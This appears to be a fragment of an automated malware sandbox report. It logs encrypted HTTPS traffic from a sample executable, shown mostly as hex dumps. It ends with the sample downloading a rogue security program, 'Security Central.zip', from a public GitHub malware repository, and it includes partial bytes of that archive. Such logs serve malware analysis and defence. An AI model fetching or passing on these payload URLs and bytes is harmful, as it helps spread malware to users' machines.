                                                                                                                                                2022-09-29 12:51:51 UTC29397INData Raw: 35 d8 9f 1e ed 10 f5 b0 aa 75 da 90 26 52 9b 7b e3 b8 94 7f d0 e3 c5 db 13 67 3f 8f 19 2b 97 d0 10 53 d5 39 08 43 47 68 da 59 70 09 e9 f4 02 df 03 9e f8 5d ce 72 c8 eb dc f9 97 88 d2 c9 28 42 26 c8 d2 47 75 f3 a8 77 81 a1 13 1c e8 15 07 de 3e 19 fd 44 1b e8 1b 91 68 b3 4a 68 36 22 e4 38 00 bf 30 2b 50 fb 33 19 06 9f 2c 47 85 77 5f 9b 8a ed 76 42 cf 46 74 a3 70 49 e1 05 cb 99 87 5b 84 7b 42 da 4c ae b6 f4 5f e0 22 a7 2f a1 01 e0 da 7e 7e fc 43 52 7b ad b7 0d 9a fa 97 0d bd 42 eb 64 30 53 0f 84 12 cd ac 54 d3 64 20 d0 89 5e 99 81 0c b6 e3 86 86 39 00 97 b3 6e 5a cb a6 e3 f5 b7 9a 3b c4 fc ec 3a b9 8a fb 98 4b ec b2 e1 cc 6f 35 be eb ac e6 ef aa c0 49 7e e3 5a c5 71 3a 67 31 ef c6 aa 2b 03 4c 0e a2 1c 4b 8f d8 a7 ce 10 f1 41 de 07 bc 7a 1f db 3c 89 20 3f b0
                                                                                                                                                Data Ascii: 5u&R{g?+S9CGhYp]r(B&Guw>DhJh6"80+P3,Gw_vBFtpI[{BL_"/~~CR{Bd0STd ^9nZ;:Ko5I~Zq:g1+LKAz< ?
                                                                                                                                                2022-09-29 12:51:51 UTC29413INData Raw: 5c 3e 15 ac 6d 4c e5 0e c6 ce 57 c0 0e 3f fd 17 99 bd b5 05 48 47 58 98 0d e1 1d 82 63 ea 9d 48 0b 39 35 2e 09 7f 7c 70 4b 97 7c 3b d3 a7 3d fc de f9 e8 de 8c f7 d7 0f 18 76 68 fa b5 2d 0e 1f 30 ec 69 f4 f3 db fc 9b 3f 1f d2 2e d5 3c 58 f8 7f 8b 34 4e 12 fe ee d6 dc c2 1a 69 58 87 4d ef 36 f9 b0 92 ef f4 7a 7d 0d eb 38 86 22 17 24 39 23 59 9a ae e9 d6 b5 83 e6 a2 6a b7 e7 22 7b 66 55 77 35 f2 3f f5 5d 75 bf 82 95 0c 51 5f 40 71 67 c1 32 d0 50 86 50 62 e6 51 75 4d 8c 41 94 07 b9 c2 fe 70 58 49 b2 dc dc 0e 89 50 d5 bc c0 a3 19 b9 0b e1 1d 2b 38 68 30 ec 9e 54 e8 c0 79 4f 54 31 e6 db 8b 9b a9 df d1 a6 34 85 55 03 2b ae 35 45 df 70 66 74 a8 14 5d 34 ec 4c e4 4b 9e 93 0c 12 b0 f3 c2 20 99 76 fe 1b 6e 26 20 a2 31 6a e0 f8 40 20 b9 46 71 c0 23 05 a2 c2 44 29 b2
                                                                                                                                                Data Ascii: \>mLW?HGXcH95.|pK|;=vh-0i?.<X4NiXM6z}8"$9#Yj"{fUw5?]uQ_@qg2PPbQuMApXIP+8h0TyOT14U+5Epft]4LK vn& 1j@ Fq#D)
                                                                                                                                                2022-09-29 12:51:51 UTC29429INData Raw: e0 d4 30 24 f1 53 45 65 39 3b 40 93 99 bc ef f7 88 5e b3 04 c4 21 62 bf 20 22 f2 c5 7e 40 63 c7 1a 33 b4 70 60 39 22 5a fc 91 46 ee 14 b3 c1 45 f7 2d 68 2f c3 54 e7 3e d8 b3 65 b3 da aa 03 af ef 5f 12 d4 12 74 df aa 84 15 45 cf c7 5b 12 32 49 1b 19 2c f8 9d 51 13 63 0b bd 7b a5 b8 ed 92 4f 63 91 e3 af ab 1a 13 47 94 98 bd 92 02 5b 7e 6c 2e 87 8d 6b 2f 24 0d d7 38 5b 1e 31 0e ee e5 25 02 da ed c3 06 42 7c c4 08 98 b3 90 0f 58 d8 25 7d fd 5e da 8a 55 1e f5 bf ac e3 49 51 37 cf fa 71 53 22 f9 3c 34 9a a5 2f dd c6 2f f2 a9 42 f2 b2 4f ab 72 fd 34 61 ae fd e1 49 ef 8d 41 36 3d f1 da 9c 75 fd 70 9a 6e 43 3f 20 9a 93 c6 74 58 58 62 ca 8f 2f 31 f9 69 f8 17 9d df 78 07 b7 ee 2b 6f 99 5e 7a 4f 8a 89 8a 60 98 b8 bd d2 3e 74 5d fe 87 db 1f 0f 0f ed 6b c5 a9 fb 0f 03
                                                                                                                                                Data Ascii: 0$SEe9;@^!b "~@c3p`9"ZFE-h/T>e_tE[2I,Qc{OcG[~l.k/$8[1%B|X%}^UIQ7qS"<4//BOr4aIA6=upnC? tXXb/1ix+o^zO`>t]k
                                                                                                                                                2022-09-29 12:51:51 UTC29445INData Raw: bc c6 66 7f f4 72 ec 9e f5 24 99 30 9e 3e dc 8d 1f 03 ab d9 11 a2 9b 12 af 03 99 05 65 94 b6 81 71 09 57 d5 17 46 af cc 3d c7 0b 94 0a f5 0d 64 85 df 74 f6 d1 27 d3 02 40 72 66 24 64 be 71 1c 88 6e 5b 76 62 59 2b 7b c2 22 10 44 41 d0 f8 2b b4 c4 e5 ce 4e b7 23 43 17 a5 c2 bf db b5 a8 62 c2 2c 16 a4 2d eb 1a 25 a7 0f 41 7e a8 38 be 6a 23 78 de 41 d7 5e fd e0 9e a0 14 95 cd a8 db d6 9d bf e1 77 46 04 a8 b5 f3 b4 61 c5 e0 7f 4d 61 e8 2f ed ab 70 b8 36 42 5d e4 81 c3 50 de c3 65 36 e7 54 0c 85 1e 08 c2 8b ac 6f a3 6a 88 f1 49 7b 46 71 08 de a2 24 83 8a 3d 6f a1 ff c1 52 80 21 6e 54 0f b2 c5 ba c3 f5 2f 52 c0 a9 74 07 1a 7b 85 10 1b 6c 00 fc e1 c5 df bd e5 0c 87 77 1d a9 60 a8 c3 0b fd d2 ad dd 3d 66 06 7e f7 08 79 75 11 35 1d dc 92 e1 73 a9 df 94 03 8c a9 91
                                                                                                                                                Data Ascii: fr$0>eqWF=dt'@rf$dqn[vbY+{"DA+N#Cb,-%A~8j#xA^wFaMa/p6B]Pe6TojI{Fq$=oR!nT/Rt{lw`=f~yu5s
                                                                                                                                                2022-09-29 12:51:51 UTC29461INData Raw: 86 ea 7d 53 b6 49 ff 0d 52 cb 78 a2 2a 22 d4 16 02 f8 84 2b 3b 11 13 c5 3e 98 48 93 18 65 15 7a 63 39 42 89 3b 0a ac f0 f4 91 f9 3d 5d fa 1d e1 8f 71 6e f1 29 5b b8 2a 50 e0 54 e8 6a b2 3b c7 57 4d 04 4f a0 d6 35 cb 77 c6 5a 83 dd 84 ee ef 07 d7 cb e8 86 65 2d 08 13 39 b9 03 d4 7a e9 9e 43 c5 8c c4 4a ec ad dd 8b 3b 0b b7 68 b4 d9 f2 7e bd ec 1c 71 92 e0 82 63 ae ac 3e 61 36 01 2a 74 9e d4 bf e0 c3 04 8b 2e 15 24 26 c4 af 68 4d 11 08 f0 58 0a 94 16 d5 5a 46 b7 96 fd 0b eb b3 bc c0 0a e7 00 20 86 58 3c e3 ae 21 0a b3 48 43 b8 8a 18 3a 10 3d 91 1b a5 b4 55 09 cb 13 f7 23 45 26 bd 34 0a 5d 25 d6 f2 9f a2 e8 ce ea d4 d5 14 8d 4d a7 0b 56 16 ef 2c b7 9d 6a 6d 3b fd 32 59 fe 7b a9 da 5d 9f 38 02 0d 0e 62 27 f0 52 a0 cd 85 82 7e 2a 3b ee af 5a ab 2e 66 b0 12 17
                                                                                                                                                Data Ascii: }SIRx*"+;>Hezc9B;=]qn)[*PTj;WMO5wZe-9zCJ;h~qc>a6*t.$&hMXZF X<!HC:=U#E&4]%MV,jm;2Y{]8b'R~*;Z.f
                                                                                                                                                2022-09-29 12:51:51 UTC29477INData Raw: 73 d4 50 cc 93 78 12 10 85 8c d6 19 da 4f 89 01 96 b5 b7 8b d2 71 ba e6 f5 4b 8a 59 42 fa 50 b1 4e 36 e0 8e 18 f6 a8 84 56 5f 9f 2b d4 ec 20 8b 90 b9 b9 9a da c4 c2 f9 87 62 a7 9c 46 fc aa f5 28 58 cc 58 ff 0b 8e 6a 91 7b 7d b1 39 89 dd 70 cb 97 69 c6 b1 cf c2 48 c3 19 63 93 85 60 d9 71 96 4b 68 52 d1 e1 56 60 e3 ea 1b ed d0 a8 ef ad 3e 0d 13 d7 d3 10 b0 35 e3 d1 55 e9 58 a4 90 0a 84 74 33 46 41 22 43 da d8 ff fd c4 44 ab 35 23 c0 b9 5a 2a 84 51 f2 04 d4 0a e9 68 ad 23 5f cb de f4 59 80 61 d5 d7 f3 4b 81 e5 c2 25 ae 26 9d ef 2a 12 9d bf 5f 60 75 ec e7 04 8b aa eb 0d a8 85 41 ce ee 78 89 e1 1e 97 39 86 c4 e2 5a 4c bc cc 7b ed 25 f0 62 b0 45 8f d7 1c 66 d8 54 71 07 a4 81 1f 77 7f a4 60 ef 7b 66 a8 d4 d6 3a b0 37 84 f0 1f 74 fd 49 04 e6 f9 92 47 27 3d 5f 26
                                                                                                                                                Data Ascii: sPxOqKYBPN6V_+ bF(XXj{}9piHc`qKhRV`>5UXt3FA"CD5#Z*Qh#_YaK%&*_`uAx9ZL{%bEfTqw`{f:7tIG'=_&
                                                                                                                                                2022-09-29 12:51:51 UTC29493INData Raw: 14 dd 58 fc 2f a6 9c 4d 0e da ec a1 e0 6f 99 08 23 27 72 23 23 aa 98 77 08 fc 7b b6 08 93 b2 7e d1 60 16 ca 7e 97 47 1f 73 34 9e 57 55 56 55 47 48 38 cf ac 3a a3 95 0e 82 1a 68 83 c1 44 98 33 00 cd 98 9d 5a ce 54 92 3a f4 66 af 17 7c 5b d4 63 5f fa 4e 3c cc 27 50 a9 84 37 2d ca 6d 60 36 18 0c 8f e2 e9 77 24 79 f8 fc 81 8d 92 79 87 58 e2 7e eb 83 1b 06 42 f9 85 bd 8f ce 41 e6 c5 e1 cc ea be 6f c0 7e 01 1b 19 96 ee 29 25 b9 9f 35 e6 d6 42 d2 ea 77 5f 72 e0 c4 2d 27 ec d7 d2 d5 75 ae 60 a2 1e 57 fb 4a b6 8e d1 5d 94 6c e7 f1 1b e4 c2 48 c1 6d bb 91 f7 a6 68 71 f3 30 e4 a5 c9 70 ea 92 d3 c8 ad 34 75 94 b3 80 ef 6c a7 ea ca 25 f4 10 3a ea 7e e1 00 f1 a5 2f 04 fa 7f be b7 61 e0 e3 b1 d4 51 cc ae a2 23 c0 b2 14 c5 27 60 1e 50 8b d2 44 e6 8e 7c 16 5b c3 66 70 6e
                                                                                                                                                Data Ascii: X/Mo#'r##w{~`~Gs4WUVUGH8:hD3ZT:f|[c_N<'P7-m`6w$yyX~BAo~)%5Bw_r-'u`WJ]lHmhq0p4ul%:~/aQ#'`PD|[fpn
                                                                                                                                                2022-09-29 12:51:51 UTC29509INData Raw: 9b a4 23 c0 5c 8a 33 dd 52 60 0a 3f 81 f0 15 47 db b3 cf dc 64 41 62 f6 68 b9 aa 81 9e 7a df 7d 54 0f 76 46 b3 5c dd 7c b9 92 bb 7e de 60 ba c0 43 78 b2 7c f3 6d 32 bd 4c 9b 48 7e 00 bb 3a 9e 50 fc 2f 8e b1 57 b9 64 30 ea 97 a1 6b 0f 5f 24 2e 75 4f 37 f4 5e 98 7c e8 c9 60 90 7d d7 13 80 eb b8 59 e4 02 d3 6f c6 39 1a 9d 81 67 a6 a6 06 99 6a 59 88 7f da b6 74 52 75 87 62 c0 b0 0d 3e c7 5d d6 1e 62 e2 4c bf 2c 2a cd 0d 74 21 e5 e3 73 a1 68 4d 7a 65 da e6 36 9e 8b 23 8d b0 57 74 74 00 88 1e 4e 2a 22 3a f6 06 0b f4 0b c7 33 21 10 bc 7b 5c ba c2 4b e7 29 e6 a7 6a 53 8f aa e6 68 bf 31 4b 90 67 af 71 e8 5d a4 e0 3f 74 63 65 d5 d3 7e 96 a5 5d ff 05 06 45 5f da 83 53 a9 6d f7 61 97 68 20 ae 8c 7f d6 83 8f 15 7c 1f 5e 56 e1 a3 ca 30 c5 c0 26 b9 5b 8c 75 ee 2c 2c 01
                                                                                                                                                Data Ascii: #\3R`?GdAbhz}TvF\|~`Cx|m2LH~:P/Wd0k_$.uO7^|`}Yo9gjYtRub>]bL,*t!shMze6#WttN*":3!{\K)jSh1Kgq]?tce~]E_Smah |^V0&[u,,
                                                                                                                                                2022-09-29 12:51:51 UTC29525INData Raw: f3 a7 b6 93 13 58 ad 6b 1e 91 60 41 8b c7 86 6b be 83 bc 28 ef 57 a9 33 1e c9 60 27 88 99 99 a4 8e 65 61 fa e7 d4 95 dc aa c6 48 9a 3b 9e dd 61 97 ef fb 19 ef 41 98 91 7e 3f 11 99 20 35 cb c8 16 7a 95 6f d0 90 62 15 52 6b af be 54 0d 0e 43 1e e2 e3 ab b1 86 20 5c 2b e1 de c1 d4 fd 74 89 69 a3 d3 0e 97 42 0e 42 31 30 49 66 60 1a 34 78 0b fc 57 d0 c3 e7 e4 32 ab a3 7f 7f 0f ef 18 58 47 be 9b c8 94 55 49 93 cb 4b 67 c4 69 eb 4f 29 e5 8c af 8a 2f 4f e3 b8 a6 88 5f c4 df 89 65 e8 f0 e6 af 23 89 21 db d2 7c bb 03 3e 51 3d fd ab 42 7a 6b 5c 26 63 6f 00 7e 0e c3 56 fd 30 2e a0 26 12 a1 95 b3 2c 1d 62 06 b7 af b2 6d 54 2a 4f 21 b1 e5 cb f6 81 5c e7 b1 c6 23 21 04 12 b8 d7 38 46 37 f2 4c b5 2d 51 52 20 a2 97 20 76 d2 97 99 50 ce af 19 36 bb 43 32 51 27 ce 8a 3b 7b
                                                                                                                                                Data Ascii: Xk`Ak(W3`'eaH;aA~? 5zobRkTC \+tiBB10If`4xW2XGUIKgiO)/O_e#!|>Q=Bzk\&co~V0.&,bmT*O!\#!8F7L-QR vP6C2Q';{
                                                                                                                                                2022-09-29 12:51:51 UTC29541INData Raw: 8f bf 4d f6 c3 94 bf 39 4d c5 24 18 92 fd 21 f9 e9 b6 95 0d d0 8b 46 96 98 ca e5 57 f5 17 ea 89 fb e9 e6 78 81 7b d4 9e bf 09 d7 f2 05 06 14 db 32 2a bb 7b 8b 31 15 38 ae 6f 02 3e 8b f8 43 30 35 cf 70 af 76 e0 26 68 d2 89 96 9e 29 ab eb f6 a6 2c 69 bb 38 45 b5 ba 92 9f 78 31 af 88 3c 8d 47 3f 6d c9 11 a3 55 5a 33 c5 b9 c6 fc 4f 80 6c d5 9d 1d 83 c4 91 03 9c fb 5f b8 98 77 72 a0 af c0 29 7d 0c 29 2e 78 ba 63 b9 41 2b d0 31 4c 59 b1 83 fe 4f f7 ec 1d 5e 3c 5b 75 b5 35 0e 85 aa 67 e9 15 5e 2e 4e 65 34 74 7c 49 1a 9e a1 df a0 b7 0e fe 99 de ae 8d 59 b8 d3 82 0c 55 27 44 55 0b 0b 77 3f 38 3a 9f 9b 0d 8f 91 ee 96 7c 57 97 53 5d ae 50 dd db c3 ea 15 fa c5 96 d5 41 2a 1e 62 59 c1 f2 43 2c 09 a1 f7 4c 8c fb 74 b1 d6 61 8d 93 34 54 96 a4 71 9c 28 4f 77 f3 a0 98 ef
                                                                                                                                                Data Ascii: M9M$!FWx{2*{18o>C05pv&h),i8Ex1<G?mUZ3Ol_wr)}).xcA+1LYO^<[u5g^.Ne4t|IYU'DUw?8:|WS]PA*bYC,Lta4Tq(Ow
                                                                                                                                                2022-09-29 12:51:51 UTC29557INData Raw: 7d 53 4f 3d 3a 43 64 06 f1 51 0a ed a1 8f bb c5 63 cc 04 12 59 15 7d 35 d6 61 ff 0b 5d b1 e0 5b 1a 99 64 b4 9d be ea 5d 78 3b cd 48 50 a3 9c fd 12 bc e8 1d 00 d1 e1 b5 0d ba 34 64 38 db 34 d8 70 70 f9 50 9d da be 04 fe cf b0 6d 60 f7 85 94 fc 34 cb 5d dd e9 3c 34 5f e6 93 1a 5c cd d9 03 14 31 7d c4 bd 6e 18 b8 43 49 b1 9e 8b c2 50 f3 37 76 19 58 ca 32 2b 6d 11 8f 1a 18 60 23 46 d5 74 a6 e5 bd 29 35 1f c4 38 ec 4a 99 6e 1a 68 5a df a2 c1 89 e4 15 f8 be 1a 15 3a 4e c3 c6 bf 99 d4 ff 9f 2e 10 0b b1 7d 1d 3a f1 2e 8d 5f c8 af f7 8e 73 41 eb ab bc 2e ae 8f f7 e9 6d 5d c7 c3 4e d3 2d 95 62 e3 ab e2 90 9f a0 59 cf cc de 29 8d e3 7d ac 83 f2 f2 10 9e c5 1e ef ec 1c d6 fd 1d 42 ad bf 1e 35 71 68 fd 01 fa ba 52 c4 26 cf 44 bd 9f 40 51 b8 c1 e8 7a 37 55 cf fb 29 42
                                                                                                                                                Data Ascii: }SO=:CdQcY}5a][d]x;HP4d84ppPm`4]<4_\1}nCIP7vX2+m`#Ft)58JnhZ:N.}:._sA.m]N-bY)}B5qhR&D@Qz7U)B
                                                                                                                                                2022-09-29 12:51:51 UTC29573INData Raw: ff c8 f9 48 d9 6d e0 4a 60 65 f8 08 2e ff a4 1a 40 b2 1f 35 51 62 49 06 34 74 2b a3 2e d9 8d 09 14 3f c5 99 24 52 2d f3 64 dd 5d d1 5e a7 f1 3d c6 91 2c c1 db 83 24 b6 81 1c 7c 34 b8 3b 1f 24 25 68 ac b8 95 d0 94 cd e4 d1 a2 12 80 9b 42 ae 74 c0 65 4b 2e af 2e 57 23 5f c2 f4 7a 6d e6 7f 0f 84 2f 9d 5c e3 8a 37 c3 08 91 4c dc c7 29 83 a4 f7 30 f9 cf 14 25 bd df ba 5c ff e9 c2 7f 5e 68 b0 69 f2 6f 6a 47 72 70 6e 1d ce d4 bf cf 28 59 57 84 a7 ac 76 31 bc 39 ee 65 ba 73 75 57 e7 85 44 62 5e 40 bd 0a 71 ee b5 5a c3 53 b0 c9 7b d6 7c 18 8a 06 2e c5 91 94 65 d9 fa 0b 78 cd cb 16 aa 8b b3 dd 5a 6b a6 ae 13 a2 f3 99 5d d3 e0 80 be 50 96 27 1a b7 04 03 a2 40 c8 1f 2b 31 5f 81 49 93 c7 a6 9b f8 1a da 98 98 f4 02 f4 4e 86 aa 89 7a 08 16 e5 da 28 74 9d 8d 8e 1f ce 98
                                                                                                                                                Data Ascii: HmJ`e.@5QbI4t+.?$R-d]^=,$|4;$%hBteK..W#_zm/\7L)0%\^hiojGrpn(YWv19esuWDb^@qZS{|.exZk]P'@+1_INz(t
                                                                                                                                                2022-09-29 12:51:51 UTC29589INData Raw: 25 92 5f 20 db 5b 85 5e ce a4 27 6b 26 3c 1f 05 73 3d 08 51 b8 32 b9 c3 19 6d b1 c3 a2 fe 0d 6f 8c 96 fa 5b 24 40 96 d5 7b da 90 0d 0a 3c 58 89 84 6d d5 12 47 54 66 ff 06 93 a6 f9 af 2f fe 37 c5 07 18 63 5e a0 4e 93 8f d0 9f a8 72 3b cb 16 eb af 94 2a b3 dd 64 33 b2 1c 0e 71 4c 95 f0 34 a1 60 dc b6 f2 28 41 2d eb 29 9d f4 97 79 61 0b 18 d7 59 78 ef 8a 91 30 26 9e 02 5a 73 92 30 2b db e8 46 31 87 fe ad 30 21 32 a8 e1 ee 51 b7 25 a1 5a f8 7b 22 68 52 97 05 05 d0 8e 00 19 be 8e 41 ae 49 03 9a cc ee 9b 8f 2c 1b 75 e1 a7 f1 00 34 21 7f a0 16 57 dc 4c 63 65 50 4e 8f 4d 65 2a c7 f3 f7 c0 72 f1 2e 29 9e 33 af ea 3b 50 6a 39 ba 4d 7f bb 29 ab a7 26 45 f8 6a 1c 7f 94 e8 49 eb 0c 72 20 2a f8 98 8b 62 41 c8 e7 bf 5d 56 04 1a 80 81 a4 3a 24 41 3b ed b8 9d a3 ed 77 24
                                                                                                                                                Data Ascii: %_ [^'k&<s=Q2mo[$@{<XmGTf/7c^Nr;*d3qL4`(A-)yaYx0&Zs0+F10!2Q%Z{"hRAI,u4!WLcePNMe*r.)3;Pj9M)&EjIr *bA]V:$A;w$
                                                                                                                                                2022-09-29 12:51:51 UTC29605INData Raw: 51 37 c5 5b 67 fa 81 30 49 7f 0d 8c 06 63 1e 42 48 66 3e e0 17 77 f7 db 76 3f 37 16 b9 24 fa 1e af fd 79 f5 c4 f5 4b 0e 79 ae 10 f3 c7 ca 12 02 69 82 32 d5 14 59 a8 78 44 8d 12 39 84 98 9c 24 9d 66 bc d7 fb e9 db d1 27 d0 76 8f ed fe 45 ad 35 c6 35 5c 1d a6 91 32 15 99 06 0c 00 6f 16 3b 10 32 02 18 7a 69 a4 24 95 f4 9a d5 fa 28 e2 02 4c dc 4b 14 0a 5f 6c 68 02 ab 39 b6 46 47 53 86 b2 af 28 b7 a3 ab 15 4c 03 36 94 66 94 11 37 d3 89 28 cf 7b 10 8d 9b b4 4c 6a 72 1c 9c 89 c8 d3 1a 53 a4 ed ca fd 53 87 17 9e 0a 2b 4d ff e0 aa 3f 0a ea 10 44 0f b5 5f 84 6c fe a1 ad ab cf 20 36 57 64 86 17 c1 00 29 e8 b7 a4 40 d1 21 52 d0 8e 26 4e 2a e9 5d 22 65 09 a9 06 06 f6 21 4f c5 d2 9c 8a 78 62 6c 8f 62 51 ac e7 aa 95 82 a4 2d 3b fc 79 c9 07 99 b6 6f 4a fc a2 36 00 65 83
                                                                                                                                                Data Ascii: Q7[g0IcBHf>wv?7$yKyi2YxD9$f'vE55\2o;2zi$(LK_lh9FGS(L6f7({LjrSS+M?D_l 6Wd)@!R&N*]"e!OxblbQ-;yoJ6e
                                                                                                                                                2022-09-29 12:51:51 UTC29621INData Raw: 28 cb 24 8c 3e 60 4f 88 83 2e d6 27 2e 01 ae e8 51 45 e2 1c 88 f2 70 d6 36 d2 b4 7e 97 2b b4 56 05 ae cd 29 49 77 83 96 13 4a 41 6b fa 78 9f 91 02 39 be f6 44 91 2b fa 7f 2a ae 1b d4 f1 a6 bf de 49 e7 9b 7b 44 85 b5 ce bd 52 88 81 40 f3 fc d7 5d 4c b6 eb 12 3f 61 a4 53 55 94 96 1d 70 9b d6 c4 1b 77 7a c1 16 ad 0c b9 f6 67 21 d6 64 8c 08 c5 99 05 19 49 35 47 14 c4 35 b5 a3 3e 70 a3 0a 0f bc 30 03 64 2d 09 f0 ad bc 1f 45 b5 3d 2e c4 0d ec e3 1b c1 0b 41 63 3a c4 47 66 1b f4 6f cc 30 d2 96 d3 3b 75 3b d5 3b 8f f8 cf 1a 4c 6e 1a 0a 3f 58 71 68 54 58 57 67 7c 54 e8 72 76 d2 64 16 6d 0a 4b ce 51 b8 53 04 b8 3a 8d 28 1c 90 18 1e 6b b8 3f 9b c9 8e b3 b3 46 a5 bc 0a 79 fe ae 86 a3 a2 2e bb 52 4d 67 24 d3 af 6e 77 6e 48 d4 86 31 39 23 32 dc f5 27 ea 3a ff d4 3c 17
                                                                                                                                                Data Ascii: ($>`O.'.QEp6~+V)IwJAkx9D+*I{DR@]L?aSUpwzg!dI5G5>p0d-E=.Ac:Gfo0;u;;Ln?XqhTXWg|TrvdmKQS:(k?Fy.RMg$nwnH19#2':<


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                54192.168.2.549754140.82.121.3443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:51:51 UTC29633OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/Security%20Central.zip HTTP/1.1
                                                                                                                                                Host: github.com
                                                                                                                                                2022-09-29 12:51:52 UTC29633INHTTP/1.1 302 Found
                                                                                                                                                Server: GitHub.com
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:52 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Security%20Central.zip
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                2022-09-29 12:51:52 UTC29634INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                55192.168.2.549755185.199.108.133443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:51:52 UTC29636OUTGET /Endermanch/MalwareDatabase/master/rogues/Security%20Central.zip HTTP/1.1
                                                                                                                                                Host: raw.githubusercontent.com
                                                                                                                                                2022-09-29 12:51:52 UTC29636INHTTP/1.1 200 OK
                                                                                                                                                Connection: close
                                                                                                                                                Content-Length: 904153
                                                                                                                                                Cache-Control: max-age=300
                                                                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                Content-Type: application/zip
                                                                                                                                                ETag: "8e55325d7d02c8c00d68591213067b37bcdc1e53f173bbf25946b78df6ae59e8"
                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                X-GitHub-Request-Id: 083B:E9DE:2DF92:A5F15:63359361
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:52 GMT
                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                X-Served-By: cache-mxp6979-MXP
                                                                                                                                                X-Cache: HIT
                                                                                                                                                X-Cache-Hits: 1
                                                                                                                                                X-Timer: S1664455912.229718,VS0,VE176
                                                                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                X-Fastly-Request-ID: be35c7fdaede07d34c74ea4ae4e200144461400e
                                                                                                                                                Expires: Thu, 29 Sep 2022 12:56:52 GMT
                                                                                                                                                Source-Age: 0
                                                                                                                                                2022-09-29 12:51:52 UTC29637INData Raw: 50 4b 03 04 14 00 01 00 08 00 50 44 9a 45 d8 2f 25 f2 17 cb 0d 00 00 22 0e 00 1e 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 53 65 63 75 72 69 74 79 43 65 6e 74 72 61 6c 2e 65 78 65 93 de 92 39 11 16 14 a3 28 f7 f0 f1 f9 49 df 84 3b 78 1e 78 4b eb e8 c8 8b 76 80 1b 30 bf 6b 3d ab 93 0f 3b d1 ef 05 65 57 77 36 bc 87 bf 0d 4b 10 58 f5 50 56 15 5e 92 26 62 a3 82 cb a0 49 4c 04 31 fb 16 a4 f4 c6 30 4f 20 6a 2a 9f 49 18 c9 db 96 6e e6 d7 0f d5 79 dd 88 92 62 e7 2c c6 f3 0a 78 2d 00 ff 80 51 8d ca 38 dd a4 d8 b3 84 a1 fd 9b 28 af 70 32 ca fd 27 e6 7a cb d0 b2 4d 1a 66 28 88 ef 52 28 b9 74 da b4 57 29 20 23 85 b8 16 ff 02 b8 15 7d be 8a e2 35 e6 f3 4b 05 d8 97 1d 8c 51 67 97 90 1f ef 8f 05 7b 11 b5 58 ce 4a 44 bf c8 79 1e 44 09 b4 29 96 5c 11 85 c6 e8 88 54 8b 99
                                                                                                                                                Data Ascii: PKPDE/%"Endermanch@SecurityCentral.exe9(I;xxKv0k=;eWw6KXPV^&bIL10O j*Inyb,x-Q8(p2'zMf(R(tW) #}5KQg{XJDyD)\T
